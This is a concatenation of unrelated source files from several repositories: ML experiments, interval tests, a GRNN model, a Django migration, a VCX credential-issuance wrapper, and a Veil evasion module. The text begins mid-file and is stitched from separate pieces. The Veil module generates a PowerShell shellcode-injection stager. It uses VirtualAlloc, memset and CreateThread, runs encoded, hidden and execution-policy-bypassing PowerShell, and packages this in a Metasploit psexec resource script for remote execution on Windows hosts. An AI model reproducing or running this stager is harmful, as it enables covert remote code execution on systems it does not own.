lines.extend(encode_file(name))
for name in binary:
lines.extend(encode_binary(name))
lines.extend(('--%s--' % boundary, ''))
body = '\r\n'.join(lines)
headers = {'content-type': 'multipart/form-data; boundary=' + boundary,
'content-length': str(len(body))}
return body, headers
def send_post(url, data, files, binary):
req = urllib2.Request(url)
connection = httplib.HTTPConnection(req.get_host())
connection.request('POST', req.get_selector(),
*encode_multipart_data(data, files, binary))
response = connection.getresponse()
if response.status != 200:
return "bad response code"
return response.read()
class PersonRecognizerProxy(object):
def __init__(self, address):
self.address = address
def recognize_person(self, image):
return send_post(self.address, {}, {}, {"img":image})
"""
import personRecognizerProxy
personRec = personRecognizerProxy.PersonRecognizerProxy("")
"""
| mit | -1,507,222,798,856,588,800 | 29.050633 | 102 | 0.576845 | false |
google/dl_bounds | dl_bounds/src/experiments/exp_sharpness.py | 1 | 3102 | # coding=utf-8
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements experimental logic."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from dl_bounds.src.data import LocalDatasetProvider
from dl_bounds.src.experiments.exp_base import Experiment
import numpy as np
import tensorflow as tf
class SharpnessExperiment(Experiment):
"""Computes sharpness complexity measure.
Sharpness described in:
N. S. Keskar, D. Mudigere, J. Nocedal, M. Smelyanskiy,
and P. T. P. Tang. On large-batch training
for deep learning: Generalization gap and sharp minima.
In ICLR 2017.
"""
def run(self):
"""Runs experiment."""
if self.exists():
tf.logging.info("Result file already exists.")
return
(x_train, y_train, x_val, y_val, _) = self.get_data()
m = x_train.shape[0]
tf.logging.info("Training set size = %d", m)
tf.logging.info("Val set size = %d", x_val.shape[0])
train_dataset = LocalDatasetProvider(
x_train, y_train, shuffle_seed=self.conf.data_shuffle_seed)
val_dataset = LocalDatasetProvider(
x_val, y_val, shuffle_seed=self.conf.data_shuffle_seed)
sharpness_dataset = LocalDatasetProvider(
x_train, y_train, shuffle_seed=self.conf.data_shuffle_seed)
n_records = self.get_n_records()
# Constants as in the paper describing sharpness measure
alpha_range = [5e-4, 1e-3, 1e-2]
n_alpha = len(alpha_range)
sharpness = np.zeros((n_records, n_alpha))
tf.logging.info("Computing sharpness on alpha=%s", ", ".join(
map(str, alpha_range)))
for (pass_index, (p, model)) in enumerate(self.train(train_dataset)):
self.measure_on_train_val(train_dataset, val_dataset, pass_index, p,
model)
self.report_train_val(pass_index)
for (i_alpha, alpha) in enumerate(alpha_range):
sharpness[pass_index, i_alpha] = model.sharpness(
sharpness_dataset,
batch_size=self.conf.batch_size,
learning_rate=self.conf.learning_rate,
init_stddev=self.conf.init_stddev,
passes=10,
optimizer=self.conf.optimizer,
alpha=alpha)
tf.logging.info(
"Sharpness (alpha=%s): %s", alpha,
", ".join(
["%.2f" % x for x in sharpness[:pass_index+1, i_alpha]]))
results = self.get_train_val_measurements()
results.update(dict(sharpness=sharpness, alpha=alpha_range))
self.save(results)
return results
| apache-2.0 | -123,532,413,234,264,400 | 32.717391 | 74 | 0.661186 | false |
kvesteri/intervals | tests/interval/test_coercion.py | 1 | 1457 | from infinity import inf
from pytest import mark, raises
from intervals import IntInterval
@mark.parametrize(('interval', 'string'), (
((1, 3), '(1, 3)'),
([1, 1], '[1, 1]'),
([1, inf], '[1,]')
))
def test_str_representation(interval, string):
assert str(IntInterval(interval)) == string
@mark.parametrize(
('number_range', 'empty'),
(
(IntInterval((2, 3)), True),
(IntInterval([2, 3]), False),
(IntInterval([2, 2]), False),
(IntInterval.from_string('[2, 2)'), True),
(IntInterval.from_string('(2, 2]'), True),
(IntInterval.from_string('[2, 3)'), False),
(IntInterval((2, 10)), False),
)
)
def test_bool(number_range, empty):
assert bool(IntInterval(number_range)) != empty
@mark.parametrize(
('number_range', 'coerced_value'),
(
([5, 5], 5),
([2, 2], 2),
)
)
def test_int_with_single_point_interval(number_range, coerced_value):
assert int(IntInterval(number_range)) == coerced_value
@mark.parametrize(
('number_range'),
(
'[2, 2)',
'(2, 2]',
)
)
def test_int_with_empty_interval(number_range):
with raises(TypeError):
int(IntInterval.from_string(number_range))
@mark.parametrize(
('number_range'),
(
[2, 4],
[2, 5],
)
)
def test_int_with_interval_containing_multiple_points(number_range):
with raises(TypeError):
int(IntInterval(number_range))
| bsd-3-clause | -7,794,547,078,260,103,000 | 21.765625 | 69 | 0.573782 | false |
itdxer/neupy | neupy/algorithms/rbfn/grnn.py | 1 | 4647 | from numpy import dot
from neupy.utils import format_data
from neupy.exceptions import NotTrained
from neupy.core.properties import BoundedProperty
from neupy.algorithms.base import BaseSkeleton
from .utils import pdf_between_data
__all__ = ('GRNN',)
class GRNN(BaseSkeleton):
"""
Generalized Regression Neural Network (GRNN). Network applies
only to the regression problems.
Parameters
----------
std : float
Standard deviation for PDF function.
If your input features have high values than standard
deviation should also be high. For instance, if input features
from range ``[0, 20]`` that standard deviation should be
also a big value like ``10`` or ``15``. Small values will
lead to bad prediction.
{Verbose.verbose}
Notes
-----
- GRNN Network is sensitive for cases when one input feature
has higher values than the other one. Input data has to be
normalized before training.
- Standard deviation has to match the range of the input features
Check ``std`` parameter description for more information.
- The bigger training dataset the slower prediction.
Algorithm is much more efficient for small datasets.
- Network uses lazy learning which mean that network doesn't
need iterative training. It just stores parameters
and use them to make a predictions.
Methods
-------
train(X_train, y_train, copy=True)
Network just stores all the information about the data and use
it for the prediction. Parameter ``copy`` copies input data
before saving it inside the network.
predict(X)
Return prediction per each sample in the ``X``.
{BaseSkeleton.fit}
Examples
--------
>>> import numpy as np
>>> from sklearn import datasets, preprocessing
>>> from sklearn.model_selection import train_test_split
>>> from neupy import algorithms
>>>
>>> dataset = datasets.load_diabetes()
>>> x_train, x_test, y_train, y_test = train_test_split(
... preprocessing.minmax_scale(dataset.data),
... preprocessing.minmax_scale(dataset.target.reshape(-1, 1)),
... test_size=0.3,
... )
>>>
>>> nw = algorithms.GRNN(std=0.1, verbose=False)
>>> nw.train(x_train, y_train)
>>>
>>> y_predicted = nw.predict(x_test)
>>> mse = np.mean((y_predicted - y_test) ** 2)
>>> mse
0.05280970704568171
"""
std = BoundedProperty(minval=0)
def __init__(self, std, verbose=False):
self.std = std
self.X_train = None
self.y_train = None
super(GRNN, self).__init__(verbose=verbose)
def train(self, X_train, y_train, copy=True):
"""
Trains network. PNN doesn't actually train, it just stores
input data and use it for prediction.
Parameters
----------
X_train : array-like (n_samples, n_features)
y_train : array-like (n_samples,)
Target variable should be vector or matrix
with one feature column.
copy : bool
If value equal to ``True`` than input matrices will
be copied. Defaults to ``True``.
Raises
------
ValueError
In case if something is wrong with input data.
"""
X_train = format_data(X_train, copy=copy)
y_train = format_data(y_train, copy=copy)
if y_train.shape[1] != 1:
raise ValueError("Target value must be one dimensional array")
self.X_train = X_train
self.y_train = y_train
if X_train.shape[0] != y_train.shape[0]:
raise ValueError("Number of samples in the input and target "
"datasets are different")
def predict(self, X):
"""
Make a prediction from the input data.
Parameters
----------
X : array-like (n_samples, n_features)
Raises
------
ValueError
In case if something is wrong with input data.
Returns
-------
array-like (n_samples,)
"""
if self.X_train is None:
raise NotTrained(
"Cannot make a prediction. Network hasn't been trained yet")
X = format_data(X)
if X.shape[1] != self.X_train.shape[1]:
raise ValueError(
"Input data must contain {0} features, got {1}"
"".format(self.X_train.shape[1], X.shape[1]))
ratios = pdf_between_data(self.X_train, X, self.std)
return (dot(self.y_train.T, ratios) / ratios.sum(axis=0)).T
| mit | 109,408,013,141,987,840 | 29.572368 | 76 | 0.596944 | false |
ITOO-UrFU/open-programs | open_programs/apps/programs/migrations/0001_initial.py | 1 | 12004 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-02 09:11
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('competences', '__first__'),
('persons', '0001_initial'),
('modules', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ChoiceGroup',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=2048, verbose_name='Наименование группы выбора')),
('labor', models.IntegerField(default=3, verbose_name='Трудоёмкость группы')),
('number', models.IntegerField(verbose_name='Номер группы выбора')),
],
options={
'verbose_name': 'группа выбора',
'verbose_name_plural': 'группы выбора',
},
),
migrations.CreateModel(
name='ChoiceGroupType',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=2048, verbose_name='Наименование типы группы выбора')),
],
options={
'verbose_name': 'тип группы выбора',
'verbose_name_plural': 'типы группы выбора',
},
),
migrations.CreateModel(
name='LearningPlan',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('uni_displayableTitle', models.CharField(blank=True, max_length=32, null=True, verbose_name='Версия')),
('uni_number', models.CharField(blank=True, max_length=32, null=True, verbose_name='Номер УП')),
('uni_active', models.CharField(blank=True, max_length=32, null=True, verbose_name='Текущая версия')),
('uni_title', models.CharField(blank=True, max_length=32, null=True, verbose_name='Название')),
('uni_stage', models.BooleanField(default=True, verbose_name='План утверждён')),
('uni_loadTimeType', models.CharField(blank=True, max_length=32, null=True, verbose_name='Единица измерения нагрузки')),
('uni_html', models.TextField(blank=True, null=True)),
],
options={
'verbose_name': 'учебный план',
'verbose_name_plural': 'учебные планы',
},
),
migrations.CreateModel(
name='Program',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('level', models.CharField(choices=[('b', 'бакалавриат'), ('m', 'магистратура'), ('s', 'специалитет')], default='b', max_length=1, verbose_name='Уровень программы')),
('title', models.CharField(default='', max_length=256, verbose_name='Наименование образовательной программы')),
('training_direction', models.CharField(default='', max_length=256, verbose_name='Направление подготовки')),
('chief', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='persons.Person', verbose_name='Руководитель образовательной программы')),
('competences', models.ManyToManyField(blank=True, to='competences.Competence')),
('learning_plans', models.ManyToManyField(blank=True, to='programs.LearningPlan')),
],
options={
'verbose_name': 'программа',
'verbose_name_plural': 'программы',
},
),
migrations.CreateModel(
name='ProgramCompetence',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=2048, verbose_name='Наименование компетенции')),
('number', models.IntegerField(verbose_name='Номер компетенции')),
],
options={
'verbose_name': 'компетенция программы',
'verbose_name_plural': 'компетенции программы',
},
),
migrations.CreateModel(
name='ProgramModules',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('semester', models.PositiveIntegerField(blank=True, null=True)),
('choice_group', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='programs.ChoiceGroup')),
('competence', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='programs.ProgramCompetence')),
('module', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='modules.Module')),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.Program')),
],
options={
'verbose_name': 'модуль программы',
'verbose_name_plural': 'модули программы',
},
),
migrations.CreateModel(
name='TargetModules',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('choice_group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.ChoiceGroup')),
('program_module', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.ProgramModules')),
],
options={
'verbose_name': 'модуль цели',
'verbose_name_plural': 'модули цели',
},
),
migrations.CreateModel(
name='TrainingTarget',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=256, verbose_name='Наименование образовательной цели')),
('number', models.IntegerField(verbose_name='Порядковый номер цели')),
('program', models.ManyToManyField(to='programs.Program')),
],
options={
'verbose_name': 'образовательная цель',
'verbose_name_plural': 'образовательные цели',
},
),
migrations.AddField(
model_name='targetmodules',
name='target',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.TrainingTarget'),
),
migrations.AddField(
model_name='choicegroup',
name='choice_group_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.ChoiceGroupType'),
),
migrations.AddField(
model_name='choicegroup',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.Program'),
),
]
| unlicense | -2,469,500,295,048,216,000 | 60.683616 | 189 | 0.588478 | false |
d3m3vilurr/Veil | modules/payloads/powershell/psPsexecVirtualAlloc.py | 1 | 2739 | """
Powershell method to inject inline shellcode.
Builds a metasploit .rc resource file to psexec the powershell command easily
Original concept from Matthew Graeber: http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
Note: the architecture independent invoker was developed independently from
https://www.trustedsec.com/may-2013/native-powershell-x86-shellcode-injection-on-64-bit-platforms/
Port to the msf resource file by @the_grayhound
"""
from modules.common import shellcode
from modules.common import helpers
class Stager:
def __init__(self):
# required
self.shortname = "PsexecVirtualAlloc"
self.description = "PowerShell VirtualAlloc method for inline shellcode injection that makes a Metasploit psexec_command .rc script"
self.rating = "Excellent"
self.language = "powershell"
self.extension = "rc"
self.shellcode = shellcode.Shellcode()
def psRaw(self):
Shellcode = self.shellcode.generate()
Shellcode = ",0".join(Shellcode.split("\\"))[1:]
baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (Shellcode)
return baseString
def generate(self):
encoded = helpers.deflate(self.psRaw())
rcScript = "use auxiliary/admin/smb/psexec_command\n"
rcScript += "set COMMAND "
rcScript += "if %PROCESSOR_ARCHITECTURE%==x86 ("
rcScript += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \\\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\\\\\"%s\\\\\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\\\"" % (encoded)
rcScript += ") else ("
rcScript += "%%WinDir%%\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \\\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\\\\\"%s\\\\\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\\\")" % (encoded)
return rcScript
| gpl-3.0 | 6,437,733,450,173,481,000 | 45.423729 | 411 | 0.706462 | false |
Artemkaaas/indy-sdk | vcx/wrappers/python3/vcx/api/issuer_credential.py | 1 | 17127 | from ctypes import *
from vcx.common import do_call, create_cb
from vcx.api.connection import Connection
from vcx.api.vcx_stateful import VcxStateful
import json
class IssuerCredential(VcxStateful):
"""
The object of the VCX API representing an Issuer side in the credential issuance process.
Assumes that pairwise connection between Issuer and Holder is already established.
# State
The set of object states and transitions depends on communication method is used.
The communication method can be specified as config option on one of *_init function. The default communication method us `proprietary`.
proprietary:
VcxStateType::VcxStateInitialized - once `vcx_issuer_create_credential` (create IssuerCredential object) is called.
VcxStateType::VcxStateOfferSent - once `vcx_issuer_send_credential_offer` (send `CRED_OFFER` message) is called.
VcxStateType::VcxStateRequestReceived - once `CRED_REQ` messages is received.
use `vcx_issuer_credential_update_state` or `vcx_issuer_credential_update_state_with_message` functions for state updates.
VcxStateType::VcxStateAccepted - once `vcx_issuer_send_credential` (send `CRED` message) is called.
aries:
VcxStateType::VcxStateInitialized - once `vcx_issuer_create_credential` (create IssuerCredential object) is called.
VcxStateType::VcxStateOfferSent - once `vcx_issuer_send_credential_offer` (send `CredentialOffer` message) is called.
VcxStateType::VcxStateRequestReceived - once `CredentialRequest` messages is received.
VcxStateType::None - once `ProblemReport` messages is received.
use `vcx_issuer_credential_update_state` or `vcx_issuer_credential_update_state_with_message` functions for state updates.
VcxStateType::VcxStateAccepted - once `vcx_issuer_send_credential` (send `Credential` message) is called.
# Transitions
proprietary:
VcxStateType::None - `vcx_issuer_create_credential` - VcxStateType::VcxStateInitialized
VcxStateType::VcxStateInitialized - `vcx_issuer_send_credential_offer` - VcxStateType::VcxStateOfferSent
VcxStateType::VcxStateOfferSent - received `CRED_REQ` - VcxStateType::VcxStateRequestReceived
VcxStateType::VcxStateRequestReceived - `vcx_issuer_send_credential` - VcxStateType::VcxStateAccepted
aries: RFC - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential
VcxStateType::None - `vcx_issuer_create_credential` - VcxStateType::VcxStateInitialized
VcxStateType::VcxStateInitialized - `vcx_issuer_send_credential_offer` - VcxStateType::VcxStateOfferSent
VcxStateType::VcxStateOfferSent - received `CredentialRequest` - VcxStateType::VcxStateRequestReceived
VcxStateType::VcxStateOfferSent - received `ProblemReport` - VcxStateType::None
VcxStateType::VcxStateRequestReceived - vcx_issuer_send_credential` - VcxStateType::VcxStateAccepted
VcxStateType::VcxStateAccepted - received `Ack` - VcxStateType::VcxStateAccepted
# Messages
proprietary:
CredentialOffer (`CRED_OFFER`)
CredentialRequest (`CRED_REQ`)
Credential (`CRED`)
aries:
CredentialProposal - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#propose-credential
CredentialOffer - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#offer-credential
CredentialRequest - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#request-credential
Credential - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#issue-credential
ProblemReport - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0035-report-problem#the-problem-report-message-type
Ack - https://github.com/hyperledger/aries-rfcs/tree/master/features/0015-acks#explicit-acks
"""
def __init__(self, source_id: str, attrs: dict, cred_def_id: str, name: str, price: float):
VcxStateful.__init__(self, source_id)
self._cred_def_id = cred_def_id
self._attrs = attrs
self._name = name
self._price = price
def __del__(self):
self.release()
self.logger.debug("Deleted {} obj: {}".format(IssuerCredential, self.handle))
@staticmethod
async def create(source_id: str, attrs: dict, cred_def_handle: int, name: str, price: str):
"""
Create a Issuer Credential object that provides a credential for an enterprise's user
Assumes a credential definition has been already written to the ledger.
:param source_id: Tag associated by user of sdk
:param attrs: attributes that will form the credential
:param cred_def_handle: Handle from previously created credential def object
:param name: Name given to the Credential
:param price: Price, in tokens, required as payment for the issuance of the credential.
Example:
source_id = '1'
cred_def_handle = 1
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_handle, name, price)
"""
constructor_params = (source_id, attrs, cred_def_handle, name, price)
c_source_id = c_char_p(source_id.encode('utf-8'))
c_cred_def_handle = c_uint32(cred_def_handle)
c_price = c_char_p(price.encode('utf-8'))
# default institution_did in config is used as issuer_did
c_issuer_did = None
c_data = c_char_p(json.dumps(attrs).encode('utf-8'))
c_name = c_char_p(name.encode('utf-8'))
c_params = (c_source_id, c_cred_def_handle, c_issuer_did, c_data, c_name, c_price)
return await IssuerCredential._create("vcx_issuer_create_credential",
constructor_params,
c_params)
@staticmethod
async def deserialize(data: dict):
"""
Create a IssuerCredential object from a previously serialized object
:param data: dict representing a serialized IssuerCredential Object
:return: IssuerCredential object
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
data = await issuer_credential.serialize()
issuer_credential2 = await IssuerCredential.deserialize(data)
"""
issuer_credential = await IssuerCredential._deserialize("vcx_issuer_credential_deserialize",
json.dumps(data),
data.get('data').get('source_id'),
data.get('data').get('price'),
data.get('data').get('credential_attributes'),
data.get('data').get('schema_seq_no'),
data.get('data').get('credential_request'))
return issuer_credential
async def serialize(self) -> dict:
"""
Serializes the issuer credential object for storage and later deserialization.
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
data = await issuer_credential.serialize()
:return: dictionary representing the serialized object
"""
return await self._serialize(IssuerCredential, 'vcx_issuer_credential_serialize')
async def update_state(self) -> int:
"""
Query the agency for the received messages.
Checks for any messages changing state in the object and updates the state attribute.
Example:
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
issuer_credential.update_state()
:return:
"""
return await self._update_state(IssuerCredential, 'vcx_issuer_credential_update_state')
async def update_state_with_message(self, message: str) -> int:
"""
Update the state of the credential based on the given message.
Example:
cred = await IssuerCredential.create(source_id)
assert await cred.update_state_with_message(message) == State.Accepted
:param message: message to process for state changes
:return Current state of the IssuerCredential
"""
return await self._update_state_with_message(IssuerCredential, message, 'vcx_issuer_credential_update_state_with_message')
async def get_state(self) -> int:
"""
Get the current state of the issuer credential object
Example:
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
issuer_credential.update_state()
:return: State of the Object. Possible states:
1 - Initialized
2 - Offer Sent
3 - Request Received
4 - Issued
"""
return await self._get_state(IssuerCredential, 'vcx_issuer_credential_get_state')
def release(self) -> None:
"""
Used to release memory associated with this object, used by the c library.
:return:
"""
self._release(IssuerCredential, 'vcx_issuer_credential_release')
async def send_offer(self, connection: Connection):
"""
Send a credential offer to a holder showing what will be included in the actual credential
:param connection: Connection that identifies pairwise connection
:return: None
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
connection = await Connection.create(source_id)
issuer_credential.send_offer(connection)
"""
if not hasattr(IssuerCredential.send_offer, "cb"):
self.logger.debug("vcx_issuer_send_credential_offer: Creating callback")
IssuerCredential.send_offer.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32))
c_credential_handle = c_uint32(self.handle)
c_connection_handle = c_uint32(connection.handle)
await do_call('vcx_issuer_send_credential_offer',
c_credential_handle,
c_connection_handle,
IssuerCredential.send_offer.cb)
async def get_offer_msg(self):
"""
Gets the offer message that can be sent to the specified connection
:param connection: Connection that identifies pairwise connection
:return: None
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
connection = await Connection.create(source_id)
issuer_credential.get_offer_msg(connection)
"""
if not hasattr(IssuerCredential.get_offer_msg, "cb"):
self.logger.debug("vcx_issuer_get_credential_offer_msg: Creating callback")
IssuerCredential.get_offer_msg.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32, c_char_p))
c_credential_handle = c_uint32(self.handle)
msg = await do_call('vcx_issuer_get_credential_offer_msg',
c_credential_handle,
IssuerCredential.get_offer_msg.cb)
return json.loads(msg.decode())
async def send_credential(self, connection: Connection):
"""
Sends the credential to the end user (holder).
:param connection: Connection that identifies pairwise connection
:return: None
Example:
credential.send_credential(connection)
"""
if not hasattr(IssuerCredential.send_credential, "cb"):
self.logger.debug("vcx_issuer_send_credential: Creating callback")
IssuerCredential.send_credential.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32))
c_credential_handle = c_uint32(self.handle)
c_connection_handle = c_uint32(connection.handle)
await do_call('vcx_issuer_send_credential',
c_credential_handle,
c_connection_handle,
IssuerCredential.send_credential.cb)
async def get_credential_msg(self, my_pw_did: str):
"""
Get the credential to send to the end user (prover).
:param my_pw_did: my pw did associated with person I'm sending credential to
:return: None
Example:
credential.send_credential(connection)
"""
if not hasattr(IssuerCredential.get_credential_msg, "cb"):
self.logger.debug("vcx_issuer_get_credential_msg: Creating callback")
IssuerCredential.get_credential_msg.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32, c_char_p))
c_credential_handle = c_uint32(self.handle)
c_my_pw_did = c_char_p(json.dumps(my_pw_did).encode('utf-8'))
msg = await do_call('vcx_issuer_get_credential_msg',
c_credential_handle,
c_my_pw_did,
IssuerCredential.get_credential_msg.cb)
return json.loads(msg.decode())
async def revoke_credential(self):
"""
Revokes a credential.
:return: None
Example:
credential.revoke_credential()
"""
if not hasattr(IssuerCredential.revoke_credential, "cb"):
self.logger.debug("vcx_issuer_revoke_credential: Creating callback")
IssuerCredential.revoke_credential.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32))
c_credential_handle = c_uint32(self.handle)
await do_call('vcx_issuer_revoke_credential',
c_credential_handle,
IssuerCredential.revoke_credential.cb)
async def get_payment_txn(self):
"""
Retrieve the payment transaction associated with this credential. This can be used to get the txn that
was used to pay the issuer from the prover. This could be considered a receipt of payment from the payer to
the issuer.
Example:
txn = credential.get_payment_txn()
:return: payment transaction
{
"amount":25,
"inputs":[
"pay:null:1_3FvPC7dzFbQKzfG",
"pay:null:1_lWVGKc07Pyc40m6"
],
"outputs":[
{"recipient":"pay:null:FrSVC3IrirScyRh","amount":5,"extra":null},
{"recipient":"pov:null:OsdjtGKavZDBuG2xFw2QunVwwGs5IB3j","amount":25,"extra":null}
]
}
"""
